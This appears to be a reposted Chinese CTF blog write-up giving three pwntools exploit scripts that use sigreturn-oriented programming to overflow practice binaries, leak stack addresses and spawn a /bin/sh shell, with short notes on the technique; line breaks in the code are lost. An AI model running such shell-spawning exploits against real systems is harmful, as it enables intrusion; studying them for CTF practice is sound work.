本文共 3267 字,大约阅读时间需要 10 分钟。
from pwn import *#p = process('./ciscn_2019_es_7')p = remote('node3.buuoj.cn',28142)elf = ELF('./ciscn_2019_es_7')context.log_level = 'debug'context.arch = 'amd64'pop_rdi = 0x4005a3vuln = 0x00000000004004ed#这里没有加上ebp,原因如下图payload = b'/bin/sh\x00'*2 + p64(vuln) p.sendline(payload)stack_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))p.recv()log.success('stack==>'+str(hex(stack_addr)))binsh_addr = stack_addr - 0x118sigret = 0x4004dasyscall = 0x400501frame = SigreturnFrame()frame.rdi = binsh_addrframe.rsi = 0frame.rdx = 0#frame.rsp = stack_addrframe.rax = constants.SYS_execveframe.rip = syscallpayload = '/bin/sh\x00'*2 + p64(sigret) + p64(syscall) + str(frame)#gdb.attach(p)p.sendline(payload)p.interactive()
1. 通过read函数溢出,pop_rax_syscall_ret 使之执行 frame中的指令(这里的地址可以选择text段)2. 在frame中设计好 返回后的ebp,esp。需要注意的 - ==在执行sigreturn时,需要pop rsi(一个参数siginfo),因此,在sigreturn之前需要准备0x8的数据==3. 返回后,再来一次sigretrun,这次知道到了/bin/sh的地址,可以直接执行execv('/bin/sh',0,0)
from pwn import *p = process('./rootersctf_2019_srop')#p = remote('node3.buuoj.cn',27344)context.log_level = 'debug'context.arch = 'amd64'text = 0x402000pop_rax_syscall_ret = 0x401032syscall_ret = 0x401033frame = SigreturnFrame()frame.rax = constants.SYS_readframe.rdi = 0frame.rsi = textframe.rdx = 0x300frame.rsp = textframe.rbp = textframe.rip = syscall_retpayload1 = 'b'*136 + p64(pop_rax_syscall_ret) + p64(0xf) + str(frame)gdb.attach(p)pause()p.send(payload1)frame = SigreturnFrame()frame.rax = constants.SYS_execveframe.rdi = textframe.rsi = 0frame.rdx = 0frame.rip = syscall_retpause()payload2 = '/bin/sh'.ljust(8,'\x00') + p64(pop_rax_syscall_ret) +p64(0xf) + str(frame)p.send(payload2)p.interactive()
from pwn import *p = remote('node3.buuoj.cn',28274)context.log_level = 'debug'#p = process('./smallest')elf = process('./smallest')context.arch = 'amd64'syscall = 0x4000beread = 0x4000b0payload = p64(read)*3 p.send(payload)#第一个 read 修改 第二个read的最后一个字节,跳过rax置零,直接执行write(1,rsp,0x400)p.send('\xb3')leak = u64(p.recv()[0x8:0x10])log.success('leak==>'+str(hex(leak)))frame = SigreturnFrame()frame.rax = constants.SYS_readframe.rdi = 0frame.rsi = leakframe.rdx = 0x400frame.rsp = leakframe.rip = syscall#第三个 read 先将frame放进栈payload2 = p64(read)+ p64(0xdeadbeef)+str(frame)#gdb.attach(p)p.send(payload2)#进行sigreturn调用,由于frame已经放进栈中,可以直接执行frame中的操作sigreturn = p64(syscall) + 'b'*7p.send(sigreturn)frame = SigreturnFrame()frame.rax = constants.SYS_execveframe.rdi = leak + 0x120frame.rsi = 0frame.rdx = 0frame.rsp = leakframe.rip = syscall#利用上一个frame 的read函数,将paylaod3放入leak地址处,计算binsh的偏移payload3 = p64(read) + 'a'*8 + str(frame)payload3 = payload3.ljust(0x120,'\x00') + '/bin/sh\x00'#gdb.attach(p)p.send(payload3)#进行sigreturn 调用p.send(sigreturn)p.interactive()
转载地址:http://ctugf.baihongyu.com/